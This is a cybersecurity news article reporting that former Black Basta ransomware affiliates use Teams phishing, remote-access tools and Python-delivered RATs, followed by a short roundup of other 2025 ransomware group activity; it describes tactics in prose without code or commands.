Ex-Members of Black Basta Leverage Microsoft Teams and Python Scripts in 2025 Cyber Attacks

Former members associated with the Black Basta ransomware operation have been observed maintaining their established tactics of email bombing and Microsoft Teams phishing to secure persistent access to target networks.

Recently, these attackers have integrated Python script execution into their methodology, utilizing cURL requests to retrieve and deploy malicious payloads. This development indicates a continued evolution and regrouping among threat actors, notwithstanding the significant setbacks that the Black Basta brand faced after a public leak of its internal communications earlier this year.

Reports indicate that half of the Teams phishing attempts recorded between February and May 2025 originated from onmicrosoft[.]com domains, while breached domains accounted for 42% of the attacks in this timeframe. Such approaches are stealthier and enable threat actors to mimic legitimate traffic during their operations.

In recent weeks, organizations in the finance, insurance, and construction sectors have been specifically targeted through Teams phishing attacks, where attackers pose as help desk personnel to deceive unsuspecting individuals.

The disbandment of Black Basta’s data leak site, despite the ongoing application of its tactics, suggests that former affiliates might have transitioned to another Ransomware-as-a-Service (RaaS) group or established a new one. Evidence points towards former members potentially joining the CACTUS RaaS group, as suggested by leaked chats referencing substantial payments to CACTUS.

It’s noteworthy that CACTUS has not identified any organizations on its data leak site since March 2025, which may indicate a strategy to reduce visibility or that the group has disbanded. There is also speculation that affiliates may have aligned with BlackLock, which is thought to be working with the DragonForce ransomware cartel.

Attackers have further exploited access obtained through Teams phishing to initiate remote desktop sessions via Quick Assist and AnyDesk, subsequently downloading and executing malicious Python scripts to facilitate command-and-control communications.

The deployment of Python scripts in these attacks signals an evolving tactic that is likely to proliferate in forthcoming Teams phishing campaigns.

The strategy of combining email spamming, Teams phishing, and Quick Assist, once characteristic of Black Basta, appears to have been adopted by the BlackSuit ransomware group, indicating potential overlaps or membership shifts between the two groups.

According to Rapid7, initial access through these methods grants an opportunity to download and execute updated variants of a Java-based Remote Access Trojan (RAT) that had been employed previously for credential harvesting in Black Basta operations. This new form of malware leverages cloud-based file hosting services from both Google and Microsoft, facilitating proxy commands through the respective cloud service provider’s infrastructure. Over time, the malware development has transitioned from direct proxy connections to utilizing platforms such as OneDrive and Google Drive.

The latest edition of the malware is designed to enhance capabilities for file transfer between the infected host and external servers, establish SOCKS5 proxy tunnels, harvest credentials stored in web browsers, simulate a fraudulent Windows login interface, and execute Java classes sourced from supplied URLs.

Recent intrusions have also featured a tunneling backdoor known as QDoor, previously linked to BlackSuit, alongside a Rust-based payload serving as a custom loader for the SSH utility, and a Python RAT referred to as Anubis.

Emerging trends in the ransomware landscape include:

– The financially motivated group Scattered Spider has targeted managed service providers (MSPs) and IT vendors, employing a “one-to-many” strategy to breach multiple organizations using a single compromise, including exploiting accounts from Tata Consultancy Services for initial access.
– Scattered Spider has developed fake login pages via the Evilginx phishing framework to circumvent multi-factor authentication (MFA) and has formed strategic partnerships with major ransomware operators, such as ALPHV (BlackCat), RansomHub, and DragonForce, to execute complex attacks against MSPs by exploiting vulnerabilities in SimpleHelp software.
– The Qilin ransomware operators have commenced coordinated attacks targeting several organizations by weaponizing vulnerabilities within Fortinet FortiGate devices.
– The Play ransomware group is believed to have breached approximately 900 entities as of May 2025, utilizing SimpleHelp vulnerabilities following their public disclosure.
– The VanHelsing ransomware group’s source code has been leaked, reflecting internal conflicts, which includes sensitive information and tools.
– The Interlock ransomware group has implemented a new JavaScript RAT, NodeSnake, in attacks on local governments and educational institutions within the UK.

Remote Access Trojans (RATs) confer substantial control over compromised systems, enabling attackers to manipulate files, monitor activities, and alter system settings. Such capabilities allow threat actors to maintain persistence within organizations, deploy additional tools, and exfiltrate data as needed.